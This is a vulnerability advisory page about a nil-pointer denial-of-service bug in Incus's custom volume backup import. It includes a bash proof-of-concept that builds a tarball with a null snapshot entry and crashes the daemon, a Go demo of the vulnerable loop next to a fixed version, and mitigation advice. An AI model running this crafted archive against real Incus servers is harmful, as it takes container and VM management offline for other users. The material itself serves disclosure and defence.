Incus, Nil-pointer dereference DoS, CVE-Unknown (medium)


The vulnerability stems from missing nil-pointer validation in Incus's custom volume backup import logic. When an authenticated user imports a storage volume backup, the daemon parses an `index.yaml` file from the archive. This YAML includes a `volume_snapshots` array. The `CreateCustomVolumeFromBackup` function iterates over `srcBackup.Config.VolumeSnapshots`, a slice of pointers to snapshot structures. For each element `s`, the code immediately dereferences `s.Name`, `s.Config`, `s.Description`, `s.CreatedAt`, and `s.ExpiresAt` without checking whether `s` is nil. Go YAML unmarshalers accept an explicit `null` entry in a sequence and decode it into a nil pointer. An attacker can therefore craft a backup archive whose `volume_snapshots` list contains a literal `null` entry. When the daemon processes this archive, it reaches the loop, accesses `s.Name` through the nil pointer, and triggers a runtime panic (nil-pointer dereference). The panic terminates the Incus daemon, causing a denial of service; repeated imports of such malformed archives can keep the daemon offline. The affected code resides in `backend.go` at line 7627 (the snapshot loop). The issue requires authentication and access to the volume import feature, which lowers the severity but still enables disruption.

The PoC constructs a tarball whose `index.yaml` holds a `volume_snapshots` list with a `null` entry (the script is reproduced below). Importing it via `incus storage volume import` panics the daemon, as shown in the logs. The root cause is the assumption that every slice element is non-nil; no validation occurs before dereferencing.

<h2 style="color: blue;">dailycve form:</h2>

Platform: Incus
Version: v6.22.0
Vulnerability: Nil-pointer dereference
Severity: Medium
Date: 2026-05-04

<h2 style="color: blue;">Prediction: 2026-05-20</h2>

<h2 style="color: blue;">What Undercode Say:</h2>

```bash
#!/bin/bash
# Generate the malformed backup archive: index.yaml carries a literal null
# entry in volume_snapshots, which the daemon decodes as a nil pointer.
mkdir -p backup/snapshots/snap0
cat > backup/index.yaml <<'EOT'
name: panic-nil-snap
backend: dir
pool: default
type: custom
snapshots:
- snap0
config:
  volume:
    name: panic-nil-snap
    type: custom
    content_type: filesystem
    config: {}
  volume_snapshots:
  - null
EOT
tar -czf exploit_null_snapshot.tar.gz backup/
rm -rf backup/

# Trigger the crash (requires an authenticated client with access to the pool).
# The client reports an error when the daemon dies, so do not abort on it.
incus storage volume import default exploit_null_snapshot.tar.gz || true

# Verify the panic in the daemon log
journalctl -u incus --since "1 minute ago" | grep -A 10 "panic: runtime error"
```

Exploit:

An authenticated user crafts a backup tarball with `volume_snapshots: [null]` in `index.yaml` and imports the volume via `incus storage volume import`. The daemon dereferences the nil pointer, panics, and terminates.

Protection from this CVE:

Upgrade to a patched Incus release (later than v6.22.0), or add a nil check before dereferencing each snapshot pointer so that a malformed archive is rejected with an error instead of crashing the daemon. Apply input validation to the `VolumeSnapshots` slice during backup import. Until patched, restrict the volume import capability to trusted users.
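To make the failure and its fix concrete, the following Go program is an added example written for this page; it is not Incus code. It models the snapshot loop with hypothetical stand-in types (`volumeSnapshot`, `backupConfig`) and uses the standard-library JSON decoder in place of the YAML library, because both decode a literal `null` list entry to a nil pointer and this keeps the example dependency-free. `vulnerableImport` reproduces the unchecked dereference, `runVulnerable` recovers the resulting panic so it can be inspected, and `hardenedImport` shows the validation a fix would apply: reject the archive with an error before any dereference. The sample index documents are constructed, not real Incus backups.

```go
package main

import (
	"encoding/json"
	"fmt"
	"time"
)

// volumeSnapshot is a hypothetical stand-in for the snapshot structure the
// import loop dereferences; the fields follow those named in the write-up.
type volumeSnapshot struct {
	Name        string            `json:"name"`
	Description string            `json:"description"`
	Config      map[string]string `json:"config"`
	CreatedAt   time.Time         `json:"created_at"`
	ExpiresAt   time.Time         `json:"expires_at"`
}

// backupConfig is a hypothetical stand-in for the config section of
// index.yaml; only the slice of snapshot pointers matters here.
type backupConfig struct {
	VolumeSnapshots []*volumeSnapshot `json:"volume_snapshots"`
}

// parseIndex decodes a constructed index. encoding/json stands in for the
// YAML decoder: both turn a literal null list entry into a nil pointer.
func parseIndex(data []byte) (*backupConfig, error) {
	var cfg backupConfig
	if err := json.Unmarshal(data, &cfg); err != nil {
		return nil, err
	}
	return &cfg, nil
}

// vulnerableImport mirrors the unchecked loop: every element is dereferenced
// without a nil check, so a null entry panics.
func vulnerableImport(cfg *backupConfig) []string {
	var names []string
	for _, s := range cfg.VolumeSnapshots {
		names = append(names, s.Name) // nil-pointer dereference when s == nil
	}
	return names
}

// runVulnerable wraps vulnerableImport and converts the panic into an error
// so the crash can be observed without taking the process down.
func runVulnerable(cfg *backupConfig) (names []string, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("panic: %v", r)
		}
	}()
	return vulnerableImport(cfg), nil
}

// hardenedImport validates the slice before any dereference and rejects the
// archive with an error instead of panicking.
func hardenedImport(cfg *backupConfig) ([]string, error) {
	names := make([]string, 0, len(cfg.VolumeSnapshots))
	for i, s := range cfg.VolumeSnapshots {
		if s == nil {
			return nil, fmt.Errorf("invalid backup: volume_snapshots[%d] is null", i)
		}
		if s.Name == "" {
			return nil, fmt.Errorf("invalid backup: volume_snapshots[%d] has no name", i)
		}
		names = append(names, s.Name)
	}
	return names, nil
}

// Constructed sample inputs (not real Incus backups).
const benignIndex = `{"volume_snapshots":[{"name":"snap0","config":{}}]}`
const maliciousIndex = `{"volume_snapshots":[{"name":"snap0","config":{}},null]}`

func main() {
	for _, raw := range []string{benignIndex, maliciousIndex} {
		cfg, err := parseIndex([]byte(raw))
		if err != nil {
			fmt.Println("decode error:", err)
			continue
		}
		names, err := runVulnerable(cfg)
		fmt.Printf("vulnerable: names=%v err=%v\n", names, err)
		names, err = hardenedImport(cfg)
		fmt.Printf("hardened:   names=%v err=%v\n", names, err)
	}
}
```

Note that the recovered error text carries Go's standard "invalid memory address or nil pointer dereference" message, the same string the `journalctl` check above greps for; in the real daemon there is no `recover`, so the process exits instead.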

Impact:

Denial of service: a remote, authenticated attacker can crash the Incus daemon repeatedly, making container and VM management unavailable. No data corruption or privilege escalation.

Sources:

Reported By: github.com